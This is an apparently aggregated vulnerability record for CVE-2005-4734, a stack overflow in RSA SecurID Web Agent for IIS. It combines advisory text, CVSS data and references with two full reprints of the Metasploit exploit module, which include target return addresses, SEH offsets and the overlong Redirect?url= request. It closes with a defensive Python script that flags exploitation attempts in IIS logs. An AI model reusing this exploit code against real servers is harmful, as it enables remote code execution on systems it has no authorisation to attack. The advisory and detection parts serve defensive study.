CVE-2005-4734
CVSS 6.4
Published: 2005-12-31 00:00:00
Revised: 2008-09-05 16:57:40

[Original] Stack-based buffer overflow in IISWebAgentIF.dll in RSA Authentication Agent for Web (aka SecurID Web Agent) 5.2 and 5.3 for IIS allows remote attackers to execute arbitrary code via a long url parameter in the Redirect method.


[CNNVD] RSA Authentication Agent IISWebAgentIF.DLL Remote Stack Buffer Overflow Vulnerability (CNNVD-200512-940)

        IISWebAgentIF.dll in the IIS versions of RSA Authentication Agent for Web (aka SecurID Web Agent) 5.2 and 5.3 contains a stack-based buffer overflow; a remote attacker can execute arbitrary code via a long url parameter in the Redirect method.

- CVSS (base score)

CVSS score: 6.4 [MEDIUM]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/a:rsa:authentication_agent_for_web:5.2  (RSA Authentication Agent for Web 5.2)
cpe:/a:rsa:authentication_agent_for_web:5.3  (RSA Authentication Agent for Web 5.3)

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4734
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-4734
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200512-940
(official data source) CNNVD

- Other links and resources

http://www.osvdb.org/20151
(UNKNOWN)  OSVDB  20151
http://www.metasploit.com/projects/Framework/exploits.html#rsa_iiswebagent_redirect
(UNKNOWN)  MISC  http://www.metasploit.com/projects/Framework/exploits.html#rsa_iiswebagent_redirect
http://secunia.com/advisories/17281
(VENDOR_ADVISORY)  SECUNIA  17281
http://www.securityfocus.com/bid/26424
(UNKNOWN)  BID  26424

- Vulnerability information

RSA Authentication Agent IISWebAgentIF.DLL Remote Stack Buffer Overflow Vulnerability
Medium severity; buffer overflow
2005-12-31 00:00:00 2006-03-20 00:00:00
Remote
        IISWebAgentIF.dll in the IIS versions of RSA Authentication Agent for Web (aka SecurID Web Agent) 5.2 and 5.3 contains a stack-based buffer overflow; a remote attacker can execute arbitrary code via a long url parameter in the Redirect method.

- Advisories and patches


- Vulnerability information (16358)

Microsoft IIS ISAPI RSA WebAgent Redirect Overflow (EDBID:16358)
windows remote
2010-09-20 Verified
0 metasploit
N/A
##
# $Id: rsa_webagent_redirect.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft IIS ISAPI RSA WebAgent Redirect Overflow',
			'Description'    => %q{
				This module exploits a stack buffer overflow in the SecurID Web
				Agent for IIS. This ISAPI filter runs in-process with
				inetinfo.exe, any attempt to exploit this flaw will result
				in the termination and potential restart of the IIS service.

			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					['CVE', '2005-4734'],
					['OSVDB', '20151'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00\x09\x0a\x0b\x0d\x20\x22\x23\x25\x26\x27\x2b\x2f" +
						(0x3a..0x3f).to_a.pack('C*') + "\x40\x5c" + "Zz",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					# Version-specific return addresses
					['RSA WebAgent 5.2', { 'Rets' => [ 996, 0x1001e694 ] }],
					['RSA WebAgent 5.3', { 'Rets' => [ 992, 0x10010e89 ] }],

					# Generic return addresses
					['RSA WebAgent 5.2 on Windows 2000 English', { 'Rets' => [ 996, 0x75022ac4 ] }],
					['RSA WebAgent 5.3 on Windows 2000 English', { 'Rets' => [ 992, 0x75022ac4 ] }],

					['RSA WebAgent 5.2 on Windows XP SP0-SP1 English', { 'Rets' => [ 996, 0x71ab1d54 ] }],
					['RSA WebAgent 5.3 on Windows XP SP0-SP1 English', { 'Rets' => [ 992, 0x71ab1d54 ] }],

					['RSA WebAgent 5.2 on Windows XP SP2 English', { 'Rets' => [ 996, 0x71ab9372 ] }],
					['RSA WebAgent 5.3 on Windows XP SP2 English', { 'Rets' => [ 992, 0x71ab9372 ] }],

					['RSA WebAgent 5.2 on Windows 2003 English SP0', { 'Rets' => [ 996, 0x7ffc0638 ] }],
					['RSA WebAgent 5.3 on Windows 2003 English SP0', { 'Rets' => [ 992, 0x7ffc0638 ] }],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Oct 21 2005'))

		register_options(
			[
				OptString.new('URL', [ true,  "The path to IISWebAgentIF.dll", "/WebID/IISWebAgentIF.dll" ]),
			], self.class)
	end

	def check
		r = send_request_raw({
			'uri'   => datastore['URL'],
			'query' => 'GetPic?image=msf'
		}, -1)

		if (r and r.body and r.body =~ /RSA Web Access Authentication/)
			return Exploit::CheckCode::Detected
		end
		return Exploit::CheckCode::Safe
	end

	def exploit

		pat = rand_text_alphanumeric(8192).gsub(/\d|Z/i, 'A') # HACK
		seh = generate_seh_payload(target['Rets'][1])
		pat[target['Rets'][0]-4, seh.length] = seh

		r = send_request_raw({
			'uri'   => datastore['URL'],
			'query' => 'Redirect?url=' + pat
		}, 5)

		handler
		disconnect
	end

end

- Vulnerability information (F83040)

Microsoft IIS ISAPI RSA WebAgent Redirect Overflow (PacketStormID:F83040)
2009-11-26 00:00:00
H D Moore  metasploit.com
exploit,web,overflow
CVE-2005-4734

This Metasploit module exploits a stack overflow in the SecurID Web Agent for IIS. This ISAPI filter runs in-process with inetinfo.exe, so any attempt to exploit this flaw will result in the termination and potential restart of the IIS service.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::Remote::Seh
	
	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Microsoft IIS ISAPI RSA WebAgent Redirect Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in the SecurID Web
				Agent for IIS. This ISAPI filter runs in-process with
				inetinfo.exe, any attempt to exploit this flaw will result
				in the termination and potential restart of the IIS service.
					
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					['CVE', '2005-4734'],
					['OSVDB', '20151'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00\x09\x0a\x0b\x0d\x20\x22\x23\x25\x26\x27\x2b\x2f\x3a\x3b\x3c" +
					              "\x3d\x3e\x3f\x40\x5c" + "Zz",
					'StackAdjustment' => -3500,

				},
			'Platform'       => 'win',
			'Targets'        => 
				[
	  				# Version-specific return addresses
					['RSA WebAgent 5.2', { 'Rets' => [ 996, 0x1001e694 ] }],
					['RSA WebAgent 5.3', { 'Rets' => [ 992, 0x10010e89 ] }],

					# Generic return addresses
					['RSA WebAgent 5.2 on Windows 2000 English', { 'Rets' => [ 996, 0x75022ac4 ] }],
					['RSA WebAgent 5.3 on Windows 2000 English', { 'Rets' => [ 992, 0x75022ac4 ] }],

					['RSA WebAgent 5.2 on Windows XP SP0-SP1 English', { 'Rets' => [ 996, 0x71ab1d54 ] }],
					['RSA WebAgent 5.3 on Windows XP SP0-SP1 English', { 'Rets' => [ 992, 0x71ab1d54 ] }],

					['RSA WebAgent 5.2 on Windows XP SP2 English', { 'Rets' => [ 996, 0x71ab9372 ] }],
					['RSA WebAgent 5.3 on Windows XP SP2 English', { 'Rets' => [ 992, 0x71ab9372 ] }],

					['RSA WebAgent 5.2 on Windows 2003 English SP0', { 'Rets' => [ 996, 0x7ffc0638 ] }],
					['RSA WebAgent 5.3 on Windows 2003 English SP0', { 'Rets' => [ 992, 0x7ffc0638 ] }],
				],
			'DefaultTarget' => 0))
			
			register_options(
				[
					OptString.new('URL', [ true,  "The path to IISWebAgentIF.dll", "/WebID/IISWebAgentIF.dll" ]),
				], self.class)
	end
	
	def check
		r = send_request_raw({
			'uri'   => datastore['URL'],
			'query' => 'GetPic?image=msf'
		}, -1)
			
		if (r and r.body and r.body =~ /RSA Web Access Authentication/) 
			return Exploit::CheckCode::Detected
		end
		return Exploit::CheckCode::Safe
	end
	
	def exploit

		pat = rand_text_alphanumeric(8192).gsub(/\d|Z/i, 'A') # HACK
		seh = generate_seh_payload(target['Rets'][1])
		pat[target['Rets'][0]-4, seh.length] = seh
		
		r = send_request_raw({
			'uri'   => datastore['URL'],
			'query' => 'Redirect?url=' + pat
		}, 5)
		
		handler
		disconnect
	end

end

- Vulnerability information

OSVDB 20151
RSA Authentication Agent for Web IISWebAgentIF.dll Redirect Overflow
Location: Remote / Network Access; Attack type: Input Manipulation
Impact: Loss of Integrity; Solution: Patch / RCS
Exploit: Public, Commercial

- Vulnerability description

A remote overflow exists in RSA Authentication Agent for Web for IIS. IISWebAgentIF.dll fails to validate the length of the "url" parameter in the "Redirect" method, resulting in a stack-based buffer overflow. With a specially crafted GET request, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- Timeline

2005-10-21 Unknown
2005-10-21 Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, RSA Security has reportedly released a patch to address this vulnerability.

- References

- Vulnerability author

- Vulnerability information

RSA Authentication Agent IISWebAgentIF.DLL Remote Stack Based Buffer Overflow Vulnerability
Class: Boundary Condition Error; BID: 26424
Remote: Yes; Local: No
Published: 2005-10-21 12:00:00; Updated: 2007-11-14 05:04:00
H.D. Moore is credited with the discovery of this vulnerability.

- Affected program versions

RSA Security Authentication Agent 5.3
RSA Security Authentication Agent 5.2

- Vulnerability discussion

RSA Authentication Agent is prone to a stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.

An attacker can exploit this issue on an affected computer to execute code in the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.

RSA Authentication Agent for Web (WebAgent) 5.2 and 5.3 for Microsoft IIS are vulnerable; other versions may also be affected.
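The OSVDB description above says the flaw is a missing length check on the "url" parameter of the "Redirect" method, and the Metasploit module on this page shows what an attempt looks like on the wire: a GET to IISWebAgentIF.dll with a Redirect?url= value of several kilobytes (the SEH overwrite sits at offset 992 or 996), preceded by a GetPic?image=msf probe from the module's check method. The following Python is an added example for defenders, not code from this record or from the Metasploit project: it parses IIS W3C extended log lines and flags both patterns. The sample log, the field order, and the 512-byte threshold are constructed assumptions; adjust the threshold to the longest legitimate redirect target your deployment issues.

```python
"""Flag CVE-2005-4734 exploitation attempts in IIS W3C extended log lines.

Added, constructed example (not from the advisory or the Metasploit module).
A record is flagged when cs-uri-stem ends in IISWebAgentIF.dll and the query
is either Redirect?url=<overlong value> or the GetPic?image=msf check probe.
"""
import re
from urllib.parse import unquote

# The Metasploit targets put the SEH overwrite 992/996 bytes into the url
# parameter and send 8192 bytes in total; no legitimate redirect target
# comes close.  512 is an assumed threshold, not a value from the advisory.
URL_PARAM_LIMIT = 512
AGENT_DLL = "iiswebagentif.dll"
CHECK_PROBE = "GetPic?image=msf"   # query sent by the module's check()

# Constructed sample log in IIS 6 W3C extended format; not real traffic.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2005-10-21 12:00:00
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2005-10-21 12:00:01 192.0.2.10 GET /WebID/IISWebAgentIF.dll GetPic?image=logo 200
2005-10-21 12:00:05 192.0.2.10 GET /WebID/IISWebAgentIF.dll Redirect?url=/protected/index.html 302
2005-10-21 12:01:10 198.51.100.7 GET /WebID/IISWebAgentIF.dll GetPic?image=msf 200
2005-10-21 12:01:12 198.51.100.7 GET /WebID/IISWebAgentIF.dll Redirect?url={} 500
2005-10-21 12:02:00 192.0.2.11 GET /default.htm - 200
""".format("A" * 8192)


def parse_w3c(text):
    """Yield one dict per data line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        values = line.split(" ")
        # Skip lines that do not match the declared field count (truncated,
        # or logged before any #Fields header was seen).
        if fields is None or len(values) != len(fields):
            continue
        yield dict(zip(fields, values))


def classify(record):
    """Return a finding label for a record, or None when it looks benign."""
    stem = record.get("cs-uri-stem", "").lower()
    if not stem.endswith(AGENT_DLL):
        return None
    query = record.get("cs-uri-query", "-")
    if query == CHECK_PROBE:
        return "metasploit-check-probe"
    m = re.match(r"Redirect\?url=(.*)", query, re.IGNORECASE)
    if m:
        # Decode percent-encoding first so a URL-encoded payload is measured
        # at the length the ISAPI filter would actually copy.
        value = unquote(m.group(1))
        if len(value) > URL_PARAM_LIMIT:
            return "cve-2005-4734-overflow-attempt"
    return None


def scan(text):
    """Return (client ip, time, label, raw query length) for every flagged record."""
    findings = []
    for rec in parse_w3c(text):
        label = classify(rec)
        if label:
            findings.append((rec["c-ip"], rec["time"], label,
                             len(rec.get("cs-uri-query", ""))))
    return findings


if __name__ == "__main__":
    for ip, when, label, qlen in scan(SAMPLE_LOG):
        print(f"{when} {ip} {label} query_len={qlen}")
```

A probe followed within seconds by an overlong Redirect request from the same client is the sequence the module produces; the module description also notes that a failed attempt terminates inetinfo.exe, so correlating these findings with IIS service restarts or W3SVC crash events confirms whether an attempt reached the vulnerable filter.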

- Exploit

The following exploit code is available:

- Solution

The vendor released an update to address this issue. Please see the references for more information.

- References
